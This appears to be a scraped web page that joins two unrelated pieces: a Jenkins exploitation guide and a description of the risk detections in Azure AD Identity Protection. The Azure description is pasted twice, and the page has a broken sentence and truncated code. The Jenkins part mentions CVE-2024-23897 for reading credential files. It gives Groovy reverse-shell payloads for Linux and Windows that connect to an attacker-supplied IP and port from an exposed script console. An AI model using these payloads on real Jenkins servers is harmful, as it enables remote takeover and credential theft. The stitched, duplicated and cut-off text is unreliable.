Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
Azure Active Directory Identity Protection is used to ,
The tool can detect the following risk factors,
Leaked credentials - If a user's credentials are leaked , AD Identity protection can get the intelligence and block the access.
Sign-ins from anonymous IP addresses - These are user sign-ins that are originated from an IP address that has been identified as an anonymous proxy IP address or VPN.
Logins from atypical locations - User sign-in occurs from geographically distant locations, where at least one of the locations may also be atypical for the user. For example, the user is login from New York and in the next hour another login request from New Delhi (Which is impossible to travel in one hour) for the same user.
Sign-in from unfamiliar locations - This processes uses the prior sign-ins of the user to detect unusual locations for new sign-ins from the user.
Sign-ins from infected devices/IP - Identifies any sign-ins that happens from devices infected with malware or Malware related IP Addresses.
Sign-ins from IP addresses with suspicious activity - Identifies the IP addresses from which a high number of failed sign-in attempts happens across multiple user accounts over a short period of time.
- Automate the detection of any identity-based risks.
- It can also be used to investigate any risks to using reports data in the portal
- It can be used to expose risk detection data to third-party utilities for further analysis.
- Also possible to auto remediate the risks
The tool can detect the following risk factors,
Leaked credentials - If a user's credentials are leaked , AD Identity protection can get the intelligence and block the access.
Sign-ins from anonymous IP addresses - These are user sign-ins that are originated from an IP address that has been identified as an anonymous proxy IP address or VPN.
Logins from atypical locations - User sign-in occurs from geographically distant locations, where at least one of the locations may also be atypical for the user. For example, the user is login from New York and in the next hour another login request from New Delhi (Which is impossible to travel in one hour) for the same user.
Sign-in from unfamiliar locations - This processes uses the prior sign-ins of the user to detect unusual locations for new sign-ins from the user.
Sign-ins from infected devices/IP - Identifies any sign-ins that happens from devices infected with malware or Malware related IP Addresses.
Sign-ins from IP addresses with suspicious activity - Identifies the IP addresses from which a high number of failed sign-in attempts happens across multiple user accounts over a short period of time.